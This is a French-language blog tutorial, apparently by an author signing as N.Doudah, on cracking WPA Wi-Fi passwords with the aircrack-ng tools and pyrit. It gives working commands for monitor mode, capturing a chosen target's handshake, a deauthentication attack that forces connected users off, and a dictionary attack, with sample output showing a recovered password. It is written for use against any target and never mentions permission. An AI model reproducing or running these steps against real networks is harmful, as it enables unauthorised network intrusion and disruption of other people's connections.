1. Nous devons d'abord maitre notre carte réseau en
mode monitor :
airmon-ng start wlan0
2. Exécutez ensuite airodump-ng pour voir tous les
réseaux sans fil disponibles :
airodump-ng mon0
3. Maintenant, nous choisissons notre cible et copions
tous les détails (ESSID, BSSID et Channel). Lorsque vous avez ces données,
fermez airodump et exécutez-le de nouveau avec la cible:
airodump-ng --bssid (BSSID HERE) -c
(CHANNEL NUMBER) -w (ESSID HERE)
4. Maintenant, vous pouvez attendre le Handshake ou en
faire une dépendante si quelqu'un est connecté au réseau. Si quelqu'un est
connecté, utilisez deauthentication:
aireplay-ng -0 10 -a (BSSID HERE)
-c (MAC ADDRES OF THE PC CONNECTED)
5. Une fois que vous avez obtenu le Handshake, fermez
l'airodump, ouvrez un nouveau terminal et testez le Handshake avec pyrit:
pyrit -r (HANDSHAKE NAME
HERE).cap analyze
Maintenant, vous devriez voir quelque chose comme
ceci, indiquant un Handshake a été trouvé sur le fichier que vous avez analysé:
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU
General Public License v3+
Parsing file 'wpapsk-linksys.dump.gz'
(1/1)...
587 packets (587 802.11-packets), 1 APs
#1: AccessPoint 00:0b:86:c2:a4:85
('linksys')
#0: Station 00:13:ce:55:98:ef, handshake
found
#1: Station 01:00:5e:7f:ff:fa
#2: Station 01:00:5e:00:00:16
6. Super ! Maintenant vous pouvez procéder à révéler le mot de passe. Avant
d'aller plus loin, vous devriez savoir pyrit a une caractéristique importante.
L'une de ces fonctionnalités est que vous pouvez importer plusieurs dictionnaires
dans la base de données. Cela signifie que vous pouvez créer une liste de mots
de passe très grand pour toutes les handshakes que vous avez ! Faisons-le ! Écrire
:
pyrit eval
7. Cela vous montrera combien de mots de passe sont dans la base de
données. Comme vous pouvez le constater, il n'existe actuellement aucun mot de
passe. Importez-les dans la base de données:
pyrit -i (DICTIONARY NAME).(FORMAT HERE) import_passwords
Rappelez-vous que le format peut varier, certains
dictionnaires sont par exemple au format .txt. Écrivez le nom et le format correctement
!
Maintenant, Pyrit devrait travailler sur la base de
données:
Connecting to storage at 'file://'...
connected.
10202 lines read. Flushing buffers...
All done.
8. Maintenant nous devons créer un ESSID. Pyrits a
besoin d'un nom pour le réseau que vous attaquez, il suffit d'écrire le Essid
du réseau que vous attaquez:
pyrit -e linksys create_essid
Exécutez "pyrit eval" pour voir l'état. Le
nombre de mots de passe apparaît et le nom de l'ESSID. Parfait !
9. Maintenant, nous devons traiter par lots la base de
données. Cela vous permettra d'économiser du temps et d'augmenter la vitesse de
craquage du mot de passe..
pyrit batch
Attaquer le Handshake avec la base de données Pyrit
pyrit -r (handshakename).cap attack_db
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU
General Public License v3+
Connecting to storage at 'file://'...
connected.
Parsing file 'wpapsk-linksys.dump.gz'
(1/1)...
587 packets (587 802.11-packets), 1 APs
Attacking handshake with Station
00:13:ce:55:98:ef...
Tried 1639 PMKs so far (39.8%); 1577435
PMKs per second.
The password is 'dictionary'.
J'espère que ce didacticiel a été utile! Si vous avez
des questions, des suggestions ou des commentaires, n'hésitez pas à commenter
ci-dessous!
Merci et amusez-vous!
N.Doudah
0 Commentaires